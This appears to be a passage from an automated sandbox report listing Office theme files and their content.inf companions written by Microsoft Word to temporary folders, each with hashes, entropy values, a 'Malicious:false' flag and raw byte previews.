                                                                                    Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE8C3.tmp\content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):282
                                                                                    Entropy (8bit):3.51145753448333
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:Q+sxnxUXKsWkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6svymD0wbnKNAH/lMz1
                                                                                    MD5:7956D2B60E2A254A07D46BCA07D0EFF0
                                                                                    SHA1:AF1AC8CA6FE2F521B2EE2B7ABAB612956A65B0B5
                                                                                    SHA-256:C92B7FD46B4553FF2A656FF5102616479F3B503341ED7A349ECCA2E12455969E
                                                                                    SHA-512:668F5D0EFA2F5168172E746A6C32820E3758793CFA5DB6791DE39CB706EF7123BE641A8134134E579D3E4C77A95A0F9983F90E44C0A1CF6CDE2C4E4C7AF1ECA0
                                                                                    Malicious:false
                                                                                    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.a.r.a.l.l.a.x...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE980.tmp\Quotable.thmx

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):966946
                                                                                    Entropy (8bit):7.8785200658952
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:qBcvGBGhXQir6H1ws6+iU0YuA35VuinHX2NPs:ccvGBGdQ5CsMxQVj3yPs
                                                                                    MD5:F03AB824395A8F1F1C4F92763E5C5CAD
                                                                                    SHA1:A6E021918C3CEFFB6490222D37ECEED1FC435D52
                                                                                    SHA-256:D96F7A63A912CA058FB140138C41DCB3AF16638BA40820016AF78DF5D07FAEDD
                                                                                    SHA-512:0241146B63C938F11045FB9DF5360F63EF05B9B3DD1272A3E3E329A1BFEC5A4A645D5472461DE9C06CFE4ADB991FE96C58F0357249806C341999C033CD88A7AF
                                                                                    Malicious:false
                                                                                    Preview:PK..........1A.......F`......[Content_Types].xml..n.@.._.y.ac $..,........-..g@.u.G.+t.:........D1...itgt>...k..lz;].8Kg^....N.l..........0.~}....ykk.A`..N..\...2+.e.c..r..P+....I.e.......|.^/.vc{......s..z....f^...8...'.zcN&.<....}.K.'h..X..y.c.qnn.s%...V('~v.W.......I%nX`.....G.........r.Gz.E..M.."..M....6n.a..V.K6.G?Qqz..............\e.K.>..lkM...`...k.5...sb.rbM8..8..9..pb..R..{>$..C.>......X..iw.'..a.09CPk.n...v....5n..Uk\...SC...j.Y.....Vq..vk>mi......z..t....v.]...n...e(.....s.i......]...q.r....~.WV/.j.Y......K..-.. Z..@.\.P..W...A..X8.`$C.F(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........c..0F...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP..........(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-.............0A...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP.........w(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........T..GI..~.....~....PK..........1A.s@.....O......._rels/.rels...J.

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE980.tmp\content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):282
                                                                                    Entropy (8bit):3.5323495192404475
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:Q+sxnxUXhduDARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyxdumymD0wbnKNAH/lMz1
                                                                                    MD5:BD6B5A98CA4E6C5DBA57C5AD167EDD00
                                                                                    SHA1:CCFF7F635B31D12707DC0AC6D1191AB5C4760107
                                                                                    SHA-256:F22248FE60A55B6C7C1EB31908FAB7726813090DE887316791605714E6E3CEF7
                                                                                    SHA-512:A178299461015970AF23BA3D10E43FCA5A6FB23262B0DD0C5DDE01D338B4959F222FD2DC2CC5E3815A69FDDCC3B6B4CB8EE6EC0883CE46093C6A59FF2B042BC1
                                                                                    Malicious:false
                                                                                    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .Q.u.o.t.a.b.l.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE9F0.tmp\Berlin.thmx

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):976001
                                                                                    Entropy (8bit):7.791956689344336
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:zHM7eZGgFiHMRej4N9tpytNZ+tIw5ErZBImlX0m:zHM7eZGgFiHMRej++NZ+F5WvllZ
                                                                                    MD5:9E563D44C28B9632A7CF4BD046161994
                                                                                    SHA1:D3DB4E5F5B1CC6DD08BB3EBF488FF05411348A11
                                                                                    SHA-256:86A70CDBE4377C32729FD6C5A0B5332B7925A91C492292B7F9C636321E6FAD86
                                                                                    SHA-512:8EB14A1B10CB5C7607D3E07E63F668CFC5FC345B438D39138D62CADF335244952FBC016A311D5CB8A71D50660C49087B909528FC06C1D10AF313F904C06CBD5C
                                                                                    Malicious:false
                                                                                    Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE9F0.tmp\content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):278
                                                                                    Entropy (8bit):3.5270134268591966
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:Q+sxnxUXa3Y1kRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyt1mymD0wbnKNAH/lMz1
                                                                                    MD5:327DA4A5C757C0F1449976BE82653129
                                                                                    SHA1:CF74ECDF94B4A8FD4C227313C8606FD53B8EEA71
                                                                                    SHA-256:341BABD413AA5E8F0A921AC309A8C760A4E9BA9CFF3CAD3FB2DD9DF70FD257A6
                                                                                    SHA-512:9184C3FB989BB271B4B3CDBFEFC47EA8ABEB12B8904EE89797CC9823F33952BD620C061885A5C11BBC1BD3978C4B32EE806418F3F21DA74F1D2DB9817F6E167E
                                                                                    Malicious:false
                                                                                    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.e.r.l.i.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                    C:\Users\user\AppData\Local\Temp\TCDEB3B.tmp\Gallery.thmx

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):1091485
                                                                                    Entropy (8bit):7.906659368807194
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:oBpmCkw3Tg/euEB+UdoC4k7ytHkHA6B/puqW2MIkTeSBmKrZHQ:MR3c/AseydwppC7veSBmWHQ
                                                                                    MD5:2192871A20313BEC581B277E405C6322
                                                                                    SHA1:1F9A6A5E10E1C3FFEB6B6725C5D2FA9ECDF51085
                                                                                    SHA-256:A06B302954A4C9A6A104A8691864A9577B0BFEA240B0915D9BEA006E98CDFFEC
                                                                                    SHA-512:6D8844D2807BB90AEA6FE0DDDB9C67542F587EC9B7FC762746164B2D4A1A99EF8368A70C97BAD7A986AAA80847F64408F50F4707BB039FCCC509133C231D53B9
                                                                                    Malicious:false
                                                                                    Preview:PK...........G`.jaV....P......[Content_Types].xml...n.@...W......T@.mwM.E....)....y...H}.N..ll8.h5g6Q.=3_......?...x..e^Di.p.^.ud...(Y/..{w..r..9.../M...Q*{..E...(.4..>..y,.>..~&..b-.a.?..4Q2Q=.2.......m....>-....;]......N'..A...g.D.m.@(}..'.3Z....#....(+....-q<uq.+....?....1.....Y?Oy......O"..J?....Q$zT.].7.N..Q Wi.....<.........-..rY....hy.x[9.b.%-<.V?.(......;r.+...Q<.;U.....4...!'k...s.&..)'k...d.s..}R....o".D.I..7..7.KL.7..Z.....v..b.5.2].f....l.t....Z...Uk...j.&.U-....&>.ia1..9lhG..Q.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.........j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oT/-c..`....7FaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,..7...&(L.....>.kw...i...i...i...i...i...i...i.......I...U_.....vT.....}..\...v..W.!-W.!-W.!-W.!-W.!-W.!-W.!-W.U...7.....k.pT...0..O.... ...>..>..>..>..>..>..>......f..2V}....W>jO....5..].?.o..oPK...........G.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70.

                                                                                    C:\Users\user\AppData\Local\Temp\TCDEB3B.tmp\content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):280
                                                                                    Entropy (8bit):3.5301133500353727
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:Q+sxnxUXp2pRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyZ2vymD0wbnKNAH/lMz1
                                                                                    MD5:1C5D58A5ED3B40486BC22B254D17D1DD
                                                                                    SHA1:69B8BB7B0112B37B9B5F9ADA83D11FBC99FEC80A
                                                                                    SHA-256:EBE031C340F04BB0235FE62C5A675CF65C5CC8CE908F4621A4F5D7EE85F83055
                                                                                    SHA-512:4736E4F26C6FAAB47718945BA54BD841FE8EF61F0DBA927E5C4488593757DBF09689ABC387A8A44F7C74AA69BA89BEE8EA55C87999898FEFEB232B1BA8CC7086
                                                                                    Malicious:false
                                                                                    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .G.a.l.l.e.r.y...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                    C:\Users\user\AppData\Local\Temp\TCDEB4B.tmp\Circuit.thmx

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                    Category:dropped
                                                                                    Size (bytes):1463634
                                                                                    Entropy (8bit):7.898382456989258
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:75MGNW/UpLkupMAqDJhNHK4/TuiKbdhbZM+byLH/:7ZwUpLkulkHK46iiDZHeLH/
                                                                                    MD5:ACBA78931B156E4AF5C4EF9E4AB3003B
                                                                                    SHA1:2A1F506749A046ECFB049F23EC43B429530EC489
                                                                                    SHA-256:943E4044C40ABA93BD7EA31E8B5EBEBD7976085E8B1A89E905952FA8DAC7B878
                                                                                    SHA-512:2815D912088BA049F468CA9D65B92F8951A9BE82AB194DBFACCF0E91F0202820F5BC9535966654D28F69A8B92D048808E95FEA93042D8C5DEA1DCB0D58BE5175
                                                                                    Malicious:false
                                                                                    Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                                                    C:\Users\user\AppData\Local\Temp\TCDEB4B.tmp\content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):280
                                                                                    Entropy (8bit):3.5286004619027067
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:Q+sxnxUXOzXkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6WymD0wbnKNAH/lMz1
                                                                                    MD5:40FF521ED2BA1B015F17F0B0E5D95068
                                                                                    SHA1:0F29C084311084B8FDFE67855884D8EB60BDE1A6
                                                                                    SHA-256:CC3575BA195F0F271FFEBA6F6634BC9A2CF5F3BE448F58DBC002907D7C81CBBB
                                                                                    SHA-512:9507E6145417AC730C284E58DC6B2063719400B395615C40D7885F78F57D55B251CB9C954D573CB8B6F073E4CEA82C0525AE90DEC68251C76A6F1B03FD9943C0
                                                                                    Malicious:false
                                                                                    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.i.r.c.u.i.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                    C:\Users\user\AppData\Local\Temp\TCDEBBB.tmp\Savon.thmx

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):1204049
                                                                                    Entropy (8bit):7.92476783994848
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:+3zSQBxvOUIpHLYTCEmS1Wu09jRalJP3sdgnmAOFt0zU4L0MRx5QNn5:+bvI5UTCPu09qP3JPOFoR4N5
                                                                                    MD5:FD5BBC58056522847B3B75750603DF0C
                                                                                    SHA1:97313E85C0937739AF7C7FC084A10BF202AC9942
                                                                                    SHA-256:44976408BD6D2703BDBE177259061A502552193B1CD05E09B698C0DAC3653C5F
                                                                                    SHA-512:DBD72827044331215A7221CA9B0ECB8809C7C79825B9A2275F3450BAE016D7D320B4CA94095F7CEF4372AC63155C78CA4795E23F93166D4720032ECF9F932B8E
                                                                                    Malicious:false
                                                                                    Preview:PK..........1A..d T....P......[Content_Types].xml..Ms.@.....!...=.7....kX 5o.,L..<..........d..g/..dw.]...C...9...#g/."L..;...#. ]..f...w../._.3Y8..X.[..7._.[...K3..3.4......D.]l.?...~.&J&...s...;...H9...e.3.q.....k-.0>Lp:.7..eT...Y...P...OVg.....G..).aV...\Z.x...W.>f...oq.8.....I?Ky...g..."...J?....A$zL.].7.M.^..\....C..d/;.J0.7k.X4.e..?N{....r.."LZx.H?. ......;r.+...A<.;U.....4...!'k...s.&..)'k...d..d......._E..D...o..o...o...f.7;s..]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...s.....0..O.... ...>..>..>..>..>..>..>.........2V}......Q}#.&T...rU....\..\..\..\..\..\..\..\.W..W.^Z....Q}c;.o...>.Z..\.v...............................*Z....K.X.5X8.obG.MP.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.M.).....j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oZ/-c..`....7CaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,...|...].k.........PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...

                                                                                    C:\Users\user\AppData\Local\Temp\TCDEBBB.tmp\content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):276
                                                                                    Entropy (8bit):3.5364757859412563
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:Q+sxnxUXARkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnywMymD0wbnKNAH/lMz1
                                                                                    MD5:CD465E8DA15E26569897213CA9F6BC9C
                                                                                    SHA1:9EA9B5E6C9B7BF72A777A21EC17FD82BC4386D4C
                                                                                    SHA-256:D4109317C2DBA1D7A94FC1A4B23FA51F4D0FC8E1D9433697AAFA72E335192610
                                                                                    SHA-512:869A42679F96414FE01FE1D79AF7B33A0C9B598B393E57E0E4D94D68A4F2107EC58B63A532702DA96A1F2F20CE72E6E08125B38745CD960DF62FE539646EDD8D
                                                                                    Malicious:false
                                                                                    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .S.a.v.o.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                    C:\Users\user\AppData\Local\Temp\TCDEE1E.tmp\Droplet.thmx

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):1750795
                                                                                    Entropy (8bit):7.892395931401988
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:DyeAqDJpUDH3xk8ZKIBuX3TPtd36v4o5d4PISMETGBP6eUP+xSeW3v0HKPsc:uRqUjSTPtd36AFDM/BP6eUeW3v0Fc
                                                                                    MD5:529795E0B55926752462CBF32C14E738
                                                                                    SHA1:E72DFF8354DF2CB6A5698F14BBD1805D72FEEAFF
                                                                                    SHA-256:8D341D1C24176DC6B67104C2AF90FABD3BFF666CCC0E269381703D7659A6FA05
                                                                                    SHA-512:A51F440F1E19C084D905B721D0257F7EEE082B6377465CB94E677C29D4E844FD8021D0B6BA26C0907B72B84157C60A3EFEDFD96C16726F6ABEA8D896D78B08CE
                                                                                    Malicious:false
                                                                                    Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                                                    C:\Users\user\AppData\Local\Temp\TCDEE1E.tmp\content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):280
                                                                                    Entropy (8bit):3.528155916440219
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:Q+sxnxUXcmlDuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyMmloymD0wbnKNAH/lMz1
                                                                                    MD5:AA7B919B21FD42C457948DE1E2988CB3
                                                                                    SHA1:19DA49CF5540E5840E95F4E722B54D44F3154E04
                                                                                    SHA-256:5FFF5F1EC1686C138192317D5A67E22A6B02E5AAE89D73D4B19A492C2F5BE2F9
                                                                                    SHA-512:01D27377942F69A0F2FE240DD73A1F97BB915E19D3D716EE4296C6EF8D8933C80E4E0C02F6C9FA72E531246713364190A2F67F43EDBE12826A1529BC2A629B00
                                                                                    Malicious:false
                                                                                    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.r.o.p.l.e.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                    C:\Users\user\AppData\Local\Temp\TCDEFB6.tmp\Slate.thmx

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):2357051
                                                                                    Entropy (8bit):7.929430745829162
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:tfVcGO3JiR6SgT7/bOCrKCsaFCX3CzwovQTSwW8nX:pVcG2iRedsaoXSzeOwWEX
                                                                                    MD5:5BDE450A4BD9EFC71C370C731E6CDF43
                                                                                    SHA1:5B223FB902D06F9FCC70C37217277D1E95C8F39D
                                                                                    SHA-256:93BFC6AC1DC1CFF497DF92B30B42056C9D422B2321C21D65728B98E420D4ED50
                                                                                    SHA-512:2365A9F76DA07D705A6053645FD2334D707967878F930061D451E571D9228C74A8016367525C37D09CB2AD82261B4B9E7CAEFBA0B96CE2374AC1FAC6B7AB5123
                                                                                    Malicious:false
                                                                                    Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                                                    C:\Users\user\AppData\Local\Temp\TCDEFB6.tmp\content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):276
                                                                                    Entropy (8bit):3.516423078177173
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:Q+sxnxUX7kARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny5ymD0wbnKNAH/lMz1
                                                                                    MD5:5402138088A9CF0993C08A0CA81287B8
                                                                                    SHA1:D734BD7F2FB2E0C7D5DB8F70B897376ECA935C9A
                                                                                    SHA-256:5C9F5E03EEA4415043E65172AD2729F34BBBFC1A1156A630C65A71CE578EF137
                                                                                    SHA-512:F40A8704F16AB1D5DCD861355B07C7CB555934BB9DA85AACDCF869DC942A9314FFA12231F9149D28D438BE6A1A14FCAB332E54B6679E29AD001B546A0F48DE64
                                                                                    Malicious:false
                                                                                    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .S.l.a.t.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                    C:\Users\user\AppData\Local\Temp\TCDEFF7.tmp\Damask.thmx

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):2218943
                                                                                    Entropy (8bit):7.942378408801199
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:8mwK3gH/l4hM06Wqnnl1IdO9wASFntrPEWNe7:863gHt4hM9WWnMdO9w35PEWK
                                                                                    MD5:EE33FDA08FBF10EF6450B875717F8887
                                                                                    SHA1:7DFA77B8F4559115A6BF186EDE51727731D7107D
                                                                                    SHA-256:5CF611069F281584DE3E63DE8B99253AA665867299DC0192E8274A32A82CAA20
                                                                                    SHA-512:AED6E11003AAAACC3FB28AE838EDA521CB5411155063DFC391ACE2B9CBDFBD5476FAB2B5CC528485943EBBF537B95F026B7B5AB619893716F0A91AEFF076D885
